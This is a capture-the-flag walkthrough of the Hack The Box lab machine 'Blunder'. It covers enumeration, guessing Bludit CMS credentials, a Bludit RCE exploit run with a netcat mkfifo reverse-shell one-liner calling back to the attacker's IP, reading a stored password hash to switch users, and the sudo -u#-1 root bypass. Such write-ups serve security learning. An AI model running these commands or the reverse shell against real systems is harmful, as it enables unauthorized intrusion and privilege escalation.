Blunder is a Linux machine rated as easy from Hack The Box, it consists on finding credentials to log in to Bludit and then use a RCE exploit to gain an initial shell, then some database files can be read in order to pivot users, finally a root shell can be spawned using sudo security bypass.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -sC -sV 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds
Browsing to port 80 we find the following page : 
Running gobuster we discover the following directories:
1
2
3
4
5
6
7
8
gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -x txt,php -q
/about (Status: 200)
/admin (Status: 301)
/0 (Status: 200)
/install.php (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
Inspecting todo.txt we can read the following text :
1
2
3
4
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
From this information we have a possible user, fergus.
Browsing to /admin contains a login page for bludit: 
We have a user but we need to find a password, now there will be two approaches: using cewl to bruteforce the login form or inspect the website to find relevant information.
In this case we will investigate, going to /about we find the following text :
1
Your About page is typically one of the most visited pages on your site, need to be simple with a few key things, such as your name, who are you, how can contact you, a small story, etc.
The story thing caught my attention, going back to the web, the first post is about Stephen King, among its lines there is one line that highlights over the rest :
1
He has created probably the best fictional character RolandDeschain in The Dark tower series
That character name must be the password, going back to the login page and using fergus:RolandDeschain confirms it
Exploitation
Searching for bludit exploits I found the following Directory traversal which allowed RCE : https://www.exploit-db.com/exploits/48568
We can use that exploit to obtain a reverse shell, a netcat one will be extracted from this page which crafts them with your ip and port.
Running the exploit :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
python3 exploit.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /t
mp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f"
╔╗ ┬ ┬ ┬┌┬┐┬┌┬┐ ╔═╗╦ ╦╔╗╔
╠╩╗│ │ │ │││ │ ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴ ╩ ╚╩╝╝╚╝
CVE-2019-16113 CyberVaca
[+] csrf_token: 0057b0263ced5122f5127fd410d3c296a106b47e
[+] cookie: h37jcdun9l47eg6snspill0ue6
[+] csrf_token: bb0bdf433be5421c5c7976a5b9bc2318674ccffe
[+] Uploading gdhajysx.jpg
[+] Executing command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
[+] Delete: .htaccess
[+] Delete: gdhajysx.jpg
And we obtain a reverse connection as www-data :
1
2
3
4
5
6
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.191] 38356
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This shell can be upgraded into a full interactive tty :
1
2
3
4
5
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
As we are www-data we need to pivot to other user which has more privileges, enumerating the system two different versions of bludit are found under /var/www
1
2
www-data@blunder:/var/www$ ls
bludit-3.10.0a bludit-3.9.2 html
A user and password hash are found inside bludit-3.10:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Instead of using john we can use other alternatives such as crackstation to crack the hash :
Now we can change user to hugo :
1
2
3
4
www-data@blunder:/var/www$ su hugo
Password:
hugo@blunder:/var/www$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
Privilege Escalation
Running sudo -l as Hugo gives an interesting output:
1
2
3
4
5
6
7
8
hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Searching this in google comes to find a sudo security bypass exploit : https://www.exploit-db.com/exploits/47502
As we can run commands as any user except root, we can use id -1 which will be interpreted as 0 allowing us to spawn a root shell :
1
2
3
4
5
6
hugo@blunder:~$ sudo -u#-1 /bin/bash
Password:
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# whoami
root